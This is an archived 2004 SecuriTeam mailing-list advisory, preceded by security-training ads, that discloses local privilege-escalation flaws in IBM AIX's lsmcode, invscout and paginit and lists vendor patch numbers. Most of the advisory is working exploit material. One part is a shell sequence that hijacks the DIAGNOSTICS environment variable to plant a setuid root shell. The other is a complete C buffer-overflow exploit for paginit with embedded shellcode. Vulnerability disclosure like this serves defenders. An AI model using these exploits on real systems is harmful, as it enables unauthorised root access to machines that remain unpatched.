Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] AIX paginit, lsmcode and invscout Local Exploits

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] AIX paginit, lsmcode and invscout Local Exploits
Date: 21 Dec 2004 18:12:22 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  AIX paginit, lsmcode and invscout Local Exploits
------------------------------------------------------------------------


SUMMARY

The following exploit codes can be used to test your system for the 
vulnerabilities in paginit, lsmcode and invscout that we partly reported 
about in our previous advisory:  
<http://www.securiteam.com/unixfocus/6O00N0AC0A.html> IBM AIX invscout 
Local Command Execution Vulnerability.

DETAILS

Vulnerable Systems:
 * IBM's AIX versions 5.1, 5.2 and 5.3

Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and 
IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and 
IY64312(5.3).

Diag vulnerability:
There are (at least) 4 broken suid binaries.
-r-sr-xr-x   1 root     system        10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x---   1 root     system         2796 Jan 26 2003 
/usr/sbin/diag_exec
-r-sr-xr-x   1 root     system       450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x   1 root     system       511362 Apr 08 2004 
/usr/sbin/invscoutd

All these binaries are exploited the same way: the path set in the 
$DIAGNOSTICS environment is used by these binaries to execute 
$DIAGNOSTICS/bin/Dctrl as root.

Example:
Executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit

Does not do a bounds check on the first commandline argument, which is 
supposed to be a username. If you feed paginit the proper data and hit 
enter, root priviledges are gained.

Exploit:
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb@cs.ru.nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, 
sizeof(shellcode)-1);
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0;
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not 
overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ceesb@cs.ru.nl> cees-bart.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] AIX paginit, lsmcode and invscout Local Exploits, SecuriTeam <=
Previous by Date:  [EXPL] Ultrix dxterm -setup Buffer Overflow, SecuriTeam
Next by Date:  [NT] PHP Input Validation Vulnerabilities (addslashes, Windows Only), SecuriTeam
Previous by Thread:  [EXPL] Ultrix dxterm -setup Buffer Overflow, SecuriTeam
Next by Thread:  [NT] PHP Input Validation Vulnerabilities (addslashes, Windows Only), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]